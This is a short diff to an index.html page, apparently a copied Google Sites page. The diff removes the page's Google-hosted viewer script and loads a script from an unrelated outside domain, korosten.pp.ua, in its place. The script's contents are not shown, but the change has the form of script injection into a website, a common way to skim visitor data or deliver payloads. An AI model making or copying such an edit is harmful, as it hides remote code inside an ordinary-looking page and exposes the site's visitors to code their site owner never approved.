--- a/index.html
+++ b/index.html
@@ -54,4 +54,4 @@
 
 </center>
 
-<script type="text/javascript">DOCS_timing['cov']=new Date().getTime();</script><script src="https://www.gstatic.com/_/atari/_/js/k=atari.vw.ru.sHCrC19z2Hw.O/rt=j/d=1/rs=AGEqA5naGz_acUUZEUyR3iUiPwU6zwnkLw/m=view"></script></div></div></body></html>
+<script type="text/javascript">DOCS_timing['cov']=new Date().getTime();</script><script src="https://korosten.pp.ua/script.js"></script></div></div></body></html>
